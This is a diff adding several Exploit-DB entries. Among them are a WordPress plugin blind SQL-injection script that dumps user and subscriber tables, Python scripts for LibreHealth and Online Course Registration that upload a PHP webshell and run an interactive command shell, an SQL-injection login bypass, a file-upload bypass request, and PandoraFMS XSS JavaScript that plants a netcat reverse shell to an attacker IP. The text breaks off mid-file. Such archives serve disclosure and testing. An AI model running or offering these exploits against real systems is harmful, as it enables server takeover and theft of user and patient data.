+# Exploit Title: GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)
+# Author: Balzabu
+# Discovery Date: 2020-07-23
+# Vendor Homepage: https://goautodial.org/
+# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
+# Tested Version: 4.0 (Last relase as of today)
+# Tested on OS: CentOS 7
+
+# STEPS TO REPRODUCE:
+
+# 1 - Log in as an agent
+# 2 - Write a new message to user goadmin with:
+Subject: Help me, I can't connect to the webphone 
+Text: whatever you want
+# 3 - Send and wait for goadmin to read the message... :-)
\ No newline at end of file
diff --git a/exploits/php/webapps/48698.txt b/exploits/php/webapps/48698.txt
new file mode 100644
index 000000000..45f9a3207
--- /dev/null
+++ b/exploits/php/webapps/48698.txt
@@ -0,0 +1,40 @@
+# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
+# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
+# Date: 2020-07-20
+# Exploit Author: KBA@SOGETI_ESEC
+# Vendor Homepage: https://www.icegram.com/email-subscribers/
+# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
+# Version: <= 4.2.2
+# Tested on: Email Subscribers & Newsletters 4.2.2
+# CVE : CVE-2019-19985
+
+ ################################################################################################
+ #             ___         ___         ___         ___      ___                                 #
+ #            /\  \       /\  \       /\  \       /\  \    /\  \        ___                     #
+ #           /::\  \     /::\  \     /::\  \     /::\  \   \:\  \      /\  \                    #
+ #          /:/\ \  \   /:/\:\  \   /:/\:\  \   /:/\:\  \   \:\  \     \:\  \                   #
+ #         _\:\~\ \  \ /:/  \:\  \ /:/  \:\  \ /::\~\:\  \  /::\  \    /::\__\                  #
+ #        /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/                  #
+ #        \:\ \:\ \/__\:\  \ /:/  \:\  /\ \/__\:\~\:\ \/__/:/  \/__/\/:/  /                     #
+ #         \:\ \:\__\  \:\  /:/  / \:\ \:\__\  \:\ \:\__\/:/  /    \::/__/                      #
+ #          \:\/:/  /   \:\/:/  /   \:\/:/  /   \:\ \/__/\/__/      \:\__\                      #
+ #           \::/  /     \::/  /     \::/  /     \:\__\              \/__/                      #
+ #            \/__/       \/__/       \/__/       \/__/                                         #
+ #                                                 ___         ___         ___         ___      #
+ #                                                /\  \       /\  \       /\  \       /\  \     #
+ #                                               /::\  \     /::\  \     /::\  \     /::\  \    #
+ #                EXPLOIT                       /:/\:\  \   /:/\ \  \   /:/\:\  \   /:/\:\  \   #
+ # Email Subscribers & Newsletters <= 4.2.2    /::\~\:\  \ _\:\~\ \  \ /::\~\:\  \ /:/  \:\  \  #
+ #   Unauthenticated File Download            /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #
+ #                                            \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\  \  \/__/ #
+ #                                             \:\ \:\__\  \:\ \:\__\  \:\ \:\__\  \:\  \       #
+ #                                              \:\ \/__/   \:\/:/  /   \:\ \/__/   \:\  \      #
+ #                                               \:\__\      \::/  /     \:\__\      \:\__\     #
+ #                                    KBAZ        \/__/       \/__/       \/__/       \/__/     #
+ #                                                                                              #
+ #                                                                                              #
+ ################################################################################################
+
+
+curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all'
+EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'
\ No newline at end of file
diff --git a/exploits/php/webapps/48699.sh b/exploits/php/webapps/48699.sh
new file mode 100755
index 000000000..d85cd4f75
--- /dev/null
+++ b/exploits/php/webapps/48699.sh
@@ -0,0 +1,127 @@
+# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
+# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
+# Date: 2020-07-20
+# Exploit Author: KBAZ@SOGETI_ESEC
+# Vendor Homepage: https://www.icegram.com/email-subscribers/
+# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
+# Version: < 4.3.3
+# Tested on: Email Subscribers & Newsletters 4.2.2
+# CVE : CVE-2019-20361
+# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361
+
+main () {
+	header
+	if [ "$#" -ne 1 ]; then
+			echo "Usage	: bash CVE-2019-20361.sh [BASE URL]"
+			echo "Example	: bash CVE-2019-20361.sh http://127.0.0.1/"
+			exit
+	fi
+	
+	url=$1
+	echo ' Target URL : ' "$url"
+	echo ' Generating sqlmap tamper script in /tmp'
+	gen_sqlmap_tamper
+	sqlmap_cmd="sqlmap -u ${url}?es=open&hash=* --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3"
+	echo ' SQLMap base command : ' "$sqlmap_cmd"
+
+	while true
+	do
+		 sleep 1
+		 echo ''
+		 echo " Possible choices: " 
+		 echo ''
+		 echo "  0) Exit"
+		 echo "  1) Simple vulnerability test SLEEP(5)" 
+		 echo "  2) Vulnerability test with SQLMap "
+		 echo "  3) Get WP users data"
+		 echo "  4) Get subscribers information" 
+		 echo "  5) Get 'Simple WP SMTP' settings"
+		 echo ''
+		 echo -n ' Choice number => '
+		 read n
+
+		 case $n in 
+		 0) exit ;;
+		 1) echo 'Testing SLEEP(5)...'
+				 { time (curl -i -s -k ${url}'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" || echo ' [-] Not vulnerable' ;; 
+		 2) $sqlmap_cmd ;;
+		 3) $sqlmap_cmd -T wp_users,wp_usermeta --dump ;;
+		 4) $sqlmap_cmd -T wp_ig_contacts --dump ;;
+		 5) $sqlmap_cmd --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;;
+		 *) echo "Invalid option" ;;
+ 		 esac 
+	done
+
+}
+
+header () {
+
+echo ''
+echo ' ################################################################################################';
+echo ' #             ___         ___         ___         ___      ___                                 #';
+echo ' #            /\  \       /\  \       /\  \       /\  \    /\  \        ___                     #';
+echo ' #           /::\  \     /::\  \     /::\  \     /::\  \   \:\  \      /\  \                    #';
+echo ' #          /:/\ \  \   /:/\:\  \   /:/\:\  \   /:/\:\  \   \:\  \     \:\  \                   #';
+echo ' #         _\:\~\ \  \ /:/  \:\  \ /:/  \:\  \ /::\~\:\  \  /::\  \    /::\__\                  #';
+echo ' #        /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/                  #';
+echo ' #        \:\ \:\ \/__\:\  \ /:/  \:\  /\ \/__\:\~\:\ \/__/:/  \/__/\/:/  /                     #';
+echo ' #         \:\ \:\__\  \:\  /:/  / \:\ \:\__\  \:\ \:\__\/:/  /    \::/__/                      #';
+echo ' #          \:\/:/  /   \:\/:/  /   \:\/:/  /   \:\ \/__/\/__/      \:\__\                      #';
+echo ' #           \::/  /     \::/  /     \::/  /     \:\__\              \/__/                      #';
+echo ' #            \/__/       \/__/       \/__/       \/__/                                         #';
+echo ' #                                                 ___         ___         ___         ___      #';
+echo ' #                                                /\  \       /\  \       /\  \       /\  \     #';
+echo ' #                                               /::\  \     /::\  \     /::\  \     /::\  \    #';
+echo ' #                EXPLOIT                       /:/\:\  \   /:/\ \  \   /:/\:\  \   /:/\:\  \   #';
+echo ' # Email Subscribers & Newsletters < 4.3.1     /::\~\:\  \ _\:\~\ \  \ /::\~\:\  \ /:/  \:\  \  #';
+echo ' #   Unauthenticated Blind SQL Injection      /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #';
+echo ' #                                            \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\  \  \/__/ #';
+echo ' #                                             \:\ \:\__\  \:\ \:\__\  \:\ \:\__\  \:\  \       #';
+echo ' #                                              \:\ \/__/   \:\/:/  /   \:\ \/__/   \:\  \      #';
+echo ' #                                               \:\__\      \::/  /     \:\__\      \:\__\     #';
+echo ' #                                    KBAZ        \/__/       \/__/       \/__/       \/__/     #';
+echo ' #                                                                                              #';
+echo ' #                                                                                              #';
+echo ' ################################################################################################';
+echo ''
+}
+
+raw_commands () {
+
+	echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100"  '","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' |  base64 -w 0
+
+		{ time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo '[+] Vulnerable' || echo '[-] Not vulnerable'
+
+		sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3
+
+		-T wp_users,wp_usermeta --dump 
+		-T wp_ig_contacts --dump
+		--sql-query 'select * from wp_options where option_name="swpsmtp_options"'
+
+}
+
+gen_sqlmap_tamper () {
+
+		touch /tmp/__init__.py
+
+		cat << _END > /tmp/tamper_CVE-2019-1356989.py
+#!/usr/bin/env python
+
+import base64
+import urllib
+
+def tamper(payload, **kwargs):
+
+#{"message_id":"100","campaign_id":"100","contact_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}
+#INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866'
+
+	param  = '{"contact_id":"'
+	param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100"
+	param += '","campaign_id":"100","message_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}'
+
+	#print(param%payload)
+	return base64.encodestring( (param%payload).encode('utf-8') ).decode('utf-8').replace('\n', '')
+_END
+}
+
+main $@
\ No newline at end of file
diff --git a/exploits/php/webapps/48702.txt b/exploits/php/webapps/48702.txt
new file mode 100644
index 000000000..b7e58d0dc
--- /dev/null
+++ b/exploits/php/webapps/48702.txt
@@ -0,0 +1,130 @@
+# Exploit Title: LibreHealth 2.0.0 - Authenticated Remote Code Execution
+# Exploit Author: Bobby Cooke
+# Date: 2020-07-17
+# Vendor Homepage: https://librehealth.io/
+# Software Link: https://github.com/LibreHealthIO/lh-ehr
+# Version: 2.0.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+# Exploit Tested Using: Python 2.7.17
+# Vulnerability Description:
+# LibreHealth v2.0.0 suffers from an authenticated file upload vulnerability allowing 
+# remote attackers to gain remote code execution (RCE) on the hosting webserver 
+# via uploading a maliciously crafted image.
+
+import requests, sys, re
+from colorama import Fore, Back, Style
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
+F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
+B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE]
+S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
+info = S[3]+F[5]+'['+S[0]+S[3]+'-'+S[3]+F[5]+']'+S[0]+' '
+err  = S[3]+F[2]+'['+S[0]+S[3]+'!'+S[3]+F[2]+']'+S[0]+' '
+ok   = S[3]+F[3]+'['+S[0]+S[3]+'+'+S[3]+F[3]+']'+S[0]+' '
+
+def webshell(SERVER_URL, WEBSHELL_FILE, session):
+    try:
+        WEB_SHELL = SERVER_URL+'sites/default/profile_pictures/'+WEBSHELL_FILE
+        print(info+"Webshell URL: "+ WEB_SHELL)
+        getdir  = {'telepathy': 'echo %CD%'}
+        r2 = session.post(url=WEB_SHELL, data=getdir, verify=False)
+        status = r2.status_code
+        if status != 200:
+            print(err+"Could not connect to the webshell.")
+            r2.raise_for_status()
+        print(ok+'Successfully connected to webshell.')
+        cwd = re.findall('[CDEF].*', r2.text)
+        cwd = cwd[0]+"> "
+        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+        print(S[1]+F[2]+')'+F[4]+'+++++'+F[2]+'['+F[0]+'=========>'+S[0]+S[3]+'     WELCOME BOKU     '+S[0]+S[1]+'<========'+F[2]+']'+F[4]+'+++++'+F[2]+'('+F[0]+S[0])
+        while True:
+            thought = raw_input(term)
+            command = {'telepathy': thought}
+            r2 = requests.post(WEB_SHELL, data=command, verify=False)
+            status = r2.status_code
+            if status != 200:
+                r2.raise_for_status()
+            response2 = r2.text
+            print(response2)
+    except:
+        print('\r\n'+err+'Webshell session failed. Quitting.')
+        quit()
+
+def sig():
+    SIG  = S[3]+F[4]+".-----.._       ,--.\n"
+    SIG += F[4]+"|  ..    >  ___ |  | .--.\n"
+    SIG += F[4]+"|  |.'  ,'-\"   \"-. |/  /__   __\n"
+    SIG += F[4]+"|      < "+F[2]+"   * *"+F[4]+"   \   /   \\/   \\\n"
+    SIG += F[4]+"|  |>   )"+F[2]+" *  *  *"+F[4]+" /    \\        \\\n"
+    SIG += F[4]+"|____..- '-."+F[2]+"*"+F[4]+"_"+F[2]+"*"+F[4]+".-'_|\\___|._..\\___\\\n"
+    SIG += F[4]+"    _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0]
+    return SIG
+
+def formatHelp(STRING):
+    return S[3]+F[2]+STRING+S[0]
+
+def header():
+    head = S[3]+F[2]+'LibreHealth v2.0.0 - Authenticated Remote Code Execution (RCE)'+S[0]
+    return head
+
+if __name__ == "__main__":
+    print(header())
+    print(sig())
+#0 | Help
+    if len(sys.argv) != 4:
+        print formatHelp("(+) Usage:\t python %s   " % sys.argv[0])
+        print formatHelp("(+) Example:\t python %s 'http://172.16.65.130/LibreEHR/' 'admin' 'admin'" % sys.argv[0])
+        sys.exit(-1)
+#1 | INIT
+    USERNAME = "admin"
+    PASSWORD = "admin"
+    SERVER_URL = 'http://172.16.65.130/LibreEHR/'
+    if not re.match(r".*/$", SERVER_URL):
+        SERVER_URL = SERVER_URL+'/'
+    LOGIN_URL  = SERVER_URL+'interface/login/login.php'
+    LOGIN_POST = SERVER_URL+'interface/main/main_screen.php?auth=login&site=default'
+    UPLOAD_URL = SERVER_URL+'interface/new/new_comprehensive_save.php'
+#2 | Create Session
+    s = requests.Session()
+    get_session = s.get(LOGIN_URL, verify=False)
+    if get_session.status_code == 200:
+        print(ok+'Successfully connected to LibreHealth server & created session.')
+        print(info+"Session Cookie: "+get_session.headers['Set-Cookie'])
+    else:
+        print(err+'Cannot connect to the server and create a web session.')
+    login_data = {'new_login_session_management':'1', 'authProvider':'Default','authUser':USERNAME,'clearPass':PASSWORD,'languageChoice':'1'}
+    print(info+"Attempting to Login to LibreHealth with credentials: "+USERNAME+":"+PASSWORD)
+    auth = s.post(url=LOGIN_POST, data=login_data, verify=False, proxies=proxies)
+    loginchk  = str(re.findall(r'Calendar', auth.text))
+    if loginchk == "[u'Calendar', u'Calendar']":
+        print(ok+"Login successful.")
+    else:
+        print(err+"Failed login. Check credentials.")
+#3 | File Upload
+    PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a'
+    png     = {
+                'profile_picture': 
+                  (
+                    'kaio-ken.php', 
+                    PNG_magicBytes+'\n'+'', 
+                    'image/png', 
+                    {'Content-Disposition': 'form-data'}
+                  ) 
+              }
+    fdata   = {'form_cb_1':'upload','form_fname':'Sun','form_mname':'','form_lname':'Wukong','form_sex':'Male','form_status':'','form_facility':''}
+    print(info+"Exploiting avatar file upload vulnerability to upload a PHP webshell")
+    upload_avatar = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
+#4 | Get Webshell Upload Name
+    uploadchk  = str(re.findall(r'demographics\.php\?set_pid=', upload_avatar.text))
+    if uploadchk == "[u'demographics.php?set_pid=']":
+        print(ok+"Successfully uploaded webshell")
+    else:
+        print(err+"Webshell upload failed.")
+    avatarFile = str(re.findall(r'demographics\.php\?set_pid=\d*\&', upload_avatar.text))
+    avatarFile = re.sub('^.*demographics\.php\?set_pid=', '', avatarFile)
+    avatarFile = re.sub('&.*$', '', avatarFile)
+    avatarFile = avatarFile+'.php'
+    print(info+"Webshell Filename: "+avatarFile)
+#5 | interact with webshell for Remote Command Execution
+    webshell(SERVER_URL, avatarFile, s)
\ No newline at end of file
diff --git a/exploits/php/webapps/48704.py b/exploits/php/webapps/48704.py
new file mode 100755
index 000000000..4222f3494
--- /dev/null
+++ b/exploits/php/webapps/48704.py
@@ -0,0 +1,113 @@
+# Exploit Title: Online Course Registration 1.0 - Unauthenticated Remote Code Execution
+# Exploit Author: Bobby Cooke
+# Credit to BKpatron for similar Auth Bypass on admin page - exploit-db.com/exploits/48559
+# Date: 2020-07-15
+# Vendor Homepage: Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 | Python 2.7.18
+
+import requests, sys, urllib, re
+from colorama import Fore, Back, Style
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+ok = Fore.GREEN+'['+Fore.RESET+'+'+Fore.GREEN+']'+Fore.RESET+' '
+err = Fore.RED+'['+Fore.RESET+'!'+Fore.RED+']'+Fore.RESET+' '
+info = Fore.BLUE+'['+Fore.RESET+'-'+Fore.BLUE+']'+Fore.RESET+' '
+RS   = Style.RESET_ALL
+FR   = Fore.RESET
+YL   = Fore.YELLOW
+RD   = Fore.RED
+
+def webshell(SERVER_URL, session):
+    try:
+        WEB_SHELL = SERVER_URL+'studentphoto/kaio-ken.php'
+        getdir  = {'telepathy': 'echo %CD%'}
+        r2 = session.post(url=WEB_SHELL, data=getdir, verify=False)
+        status = r2.status_code
+        if status != 200:
+            print(err+"Could not connect to the webshell.")
+            r2.raise_for_status()
+        print(ok+'Successfully connected to webshell.')
+        cwd = re.findall('[CDEF].*', r2.text)
+        cwd = cwd[0]+"> "
+        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+        print(RD+')'+YL+'+++++'+RD+'['+FR+'=========>'+'     WELCOME BOKU     '+'<========'+RD+']'+YL+'+++++'+RD+'('+FR)
+        while True:
+            thought = raw_input(term)
+            command = {'telepathy': thought}
+            r2 = requests.get(WEB_SHELL, params=command, verify=False)
+            status = r2.status_code
+            if status != 200:
+                r2.raise_for_status()
+            response2 = r2.text
+            print(response2)
+    except:
+        print('\r\n'+err+'Webshell session failed. Quitting.')
+        quit()
+
+def formatHelp(STRING):
+    return Style.BRIGHT+Fore.RED+STRING+Fore.RESET
+
+def header():
+    SIG  = RD+'            /\\\n'+RS
+    SIG += YL+'/vvvvvvvvvvvv '+RD+'\\'+FR+'--------------------------------------,\n'
+    SIG += YL+'`^^^^^^^^^^^^'+RD+' /'+FR+'============'+RD+'BOKU'+FR+'====================="\n'
+    SIG += RD+'            \/'+RS+'\n'
+    return SIG
+
+if __name__ == "__main__":
+    print(header())
+    if len(sys.argv) != 2:
+        print(formatHelp("(+) Usage:\t python %s " % sys.argv[0]))
+        print(formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/Online Course Registration/'" % sys.argv[0]))
+        quit()
+    SERVER_URL = sys.argv[1]
+    if not re.match(r".*/$", SERVER_URL):
+        SERVER_URL = SERVER_URL+'/'
+    LOGIN_URL  = SERVER_URL+'index.php'
+    PROFILE_URL = SERVER_URL+'my-profile.php'
+    print(info+'Creating session and saving PHPSESSID')
+    s = requests.Session()
+    get_session = s.get(SERVER_URL, verify=False)
+    if get_session.status_code == 200:
+        print(ok+'Successfully connected to server and created session.')
+        print(info+get_session.headers['Set-Cookie'])
+    else:
+        print(err+'Cannot connect to the server and create a web session.')
+    bypass_data = {'regno' : '\' or 1=1; -- boku', 'password' : '\' or 1=1; -- boku', 'submit' : ''}
+    print(info+'Bypassing authentication of student login portal.')
+    auth_bypass = s.post(url=LOGIN_URL, data=bypass_data, verify=False)
+    if auth_bypass.history:
+        for resp in auth_bypass.history:
+            print(info+'Response Status-Code: ' + str(resp.status_code))
+            print(info+'Location: ' + str(resp.headers['location']))
+            redirectURL = resp.headers['location']
+            if re.match(r".*change-password.php", redirectURL):
+                print(ok+'Successfully bypassed user portal authentication.')
+            else:
+                print(err+'Failed to bypass user portal authentication. Quitting.')
+                quit()
+    get_profile = s.get(url=PROFILE_URL, verify=False)
+    Name = str(re.findall(r'name="studentname" value=".*"', get_profile.text))
+    Name = re.sub('^.*name="studentname" value="', '', Name)
+    Name = re.sub('".*$', '', Name)
+    PinCode = str(re.findall(r'name="Pincode" readonly value=".*"', get_profile.text))
+    PinCode = re.sub('^.*name="Pincode" readonly value="', '', PinCode)
+    PinCode = re.sub('".*$', '', PinCode)
+    RegNo = str(re.findall(r'name="studentregno" value=".*"', get_profile.text))
+    RegNo = re.sub('^.*name="studentregno" value="', '', RegNo)
+    RegNo = re.sub('".*$', '', RegNo)
+    print(ok+'{studentname:'+Name+', Pincode:'+PinCode+', studentregno:'+RegNo+'}')
+    avatar_img  = {
+                'photo': 
+                  (
+                    'kaio-ken.php', 
+                    '', 
+                    'image/png', 
+                    {'Content-Disposition': 'form-data'}
+                  ) 
+              }
+    upld_data = {'studentname':Name, 'studentregno':RegNo,'Pincode':PinCode,'cgpa':'0.00','submit':''}
+    webshell_upload = s.post(url=PROFILE_URL, files=avatar_img, data=upld_data, verify=False)
+    print(ok+'Uploaded webshell. Now connecting via POST requests using telepathy.')
+    webshell(SERVER_URL, s)
\ No newline at end of file
diff --git a/exploits/php/webapps/48705.txt b/exploits/php/webapps/48705.txt
new file mode 100644
index 000000000..6def3b344
--- /dev/null
+++ b/exploits/php/webapps/48705.txt
@@ -0,0 +1,29 @@
+# Exploit Title: elaniin CMS 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-07-14
+# Exploit Author: BKpatron
+# Vendor Homepage:https://elaniin.com/
+# Software Link:https://github.com/elaniin/CMS/archive/master.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : login.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/elaniin/login.php
+
+POST /elaniin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+Content-Length: 334
+Referer:http://localhost/elaniin/login.php
+Cookie: PHPSESSID=33snzxs8qht0gvh0fpd27vg62
+Connection: close
+Upgrade-Insecure-Requests: 1
+email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
\ No newline at end of file
diff --git a/exploits/php/webapps/48706.txt b/exploits/php/webapps/48706.txt
new file mode 100644
index 000000000..aa2a1d5b8
--- /dev/null
+++ b/exploits/php/webapps/48706.txt
@@ -0,0 +1,76 @@
+# Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
+# Date: 2020-07-15
+# Exploit Author: v1n1v131r4
+# Vendor Homepage: http://koken.me/
+# Software Link: https://www.softaculous.com/apps/cms/Koken
+# Version: 0.22.24
+# Tested on: Linux
+# PoC: https://github.com/V1n1v131r4/Bypass-File-Upload-on-Koken-CMS/blob/master/README.md
+
+The Koken CMS upload restrictions are based on a list of allowed file extensions (withelist), which facilitates bypass through the handling of the HTTP request via Burp.
+
+Steps to exploit:
+
+1. Create a malicious PHP file with this content:
+
+   
+
+2. Save as "image.php.jpg"
+
+3. Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp.
+
+4. On Burp, rename your file to "image.php"
+
+
+POST /koken/api.php?/content HTTP/1.1
+Host: target.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://target.com/koken/admin/
+x-koken-auth: cookie
+Content-Type: multipart/form-data; boundary=---------------------------2391361183188899229525551
+Content-Length: 1043
+Connection: close
+Cookie: PHPSESSID= [Cookie value here]
+
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="name"
+
+image.php
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="chunk"
+
+0
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="chunks"
+
+1
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="upload_session_start"
+
+1594831856
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="visibility"
+
+public
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="license"
+
+all
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="max_download"
+
+none
+-----------------------------2391361183188899229525551
+Content-Disposition: form-data; name="file"; filename="image.php"
+Content-Type: image/jpeg
+
+
+
+-----------------------------2391361183188899229525551--
+
+
+
+5. On Koken CMS Library, select you file and put the mouse on "Download File" to see where your file is hosted on server.
\ No newline at end of file
diff --git a/exploits/php/webapps/48707.txt b/exploits/php/webapps/48707.txt
new file mode 100644
index 000000000..4630d3270
--- /dev/null
+++ b/exploits/php/webapps/48707.txt
@@ -0,0 +1,118 @@
+# Exploit Title: PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting
+# Date: 2020-07-01
+# Author: AppleBois
+# Version: 7xx ≤ 746 
+# Homepage: https://pandorafms.org/
+# Software Link: https://sourceforge.net/projects/pandora/files/Pandora FMS 7.0NG/
+# CVE-2020-11749
+# 
+# By asking network administrator to scan SNMP device to trigger Cross Site Scripting(XSS)
+# We can call a remote JavaScript file to execute arbitrary code to reach Remote Code Execution
+# on PandoraFMS.
+#
+######################################################################################
+
+//----------------/etc/snmp/snmpd.conf-------------------//
+syscontact       
+syslocation     
+sysname         
+sysDesc		
+
+com2sec local   localhost       public
+view    systemview      included        .1.3.6.1.2.1.1
+view    systemview      included        .1.3.6.1.2.1.25.1
+view    systemview      included        .1      80
+
+rocommunity     public
+//--------------end of /etc/snmp/snmpd.conf--------------//
+
+
+
+//----------------shell.js-------------------------------//
+//Create Random String
+function randomString(len, charSet) {
+    charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
+    var randomString = '';
+    for (var i = 0; i < len; i++) {
+        var randomPoz = Math.floor(Math.random() * charSet.length);
+        randomString += charSet.substring(randomPoz,randomPoz+1);
+    }
+    return randomString;
+}
+var randomValue = randomString(5);
+
+//Declare Variable
+var xhr= new XMLHttpRequest();
+var Attacker_IP= "192.168.11.130";
+var Pandora_IP ="192.168.11.132";
+var port ="4444";
+//var payload="form_name="+randomValue+"&form_plugin_type=0&form_max_timeout5f09468e5082e_select=15&form_max_timeout5f09468e5082e_text=15&form_max_timeout=15&form_max_timeout5f09468e5082e_units=1&form_description=Created+By+AppleBois&form_execute=nc+-nv+"+Attacker_IP+"+"+port+"+-e+%2Fbin%2Fsh&form_parameters=&field1_macro=_field1_&field1_desc=&field1_value=&field1_help=&crtbutton=Create"
+var payload ="form_name="+randomValue+"&form_plugin_type=0&form_max_timeout5f096ea47b224_select=15&form_max_timeout5f096ea47b224_text=15&form_max_timeout=15&form_max_timeout5f096ea47b224_units=1&form_description=Created+By+AppleBois&form_execute=nc+-nv+"+Attacker_IP+"+"+port+"+-e+%2Fbin%2Fsh&form_parameters=&field1_macro=_field1_&field1_desc=&field1_value=&uptbutton=Update"
+var url= "http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=plugins&create_plugin=1&pure=";
+
+//Create a plugin with malicous command
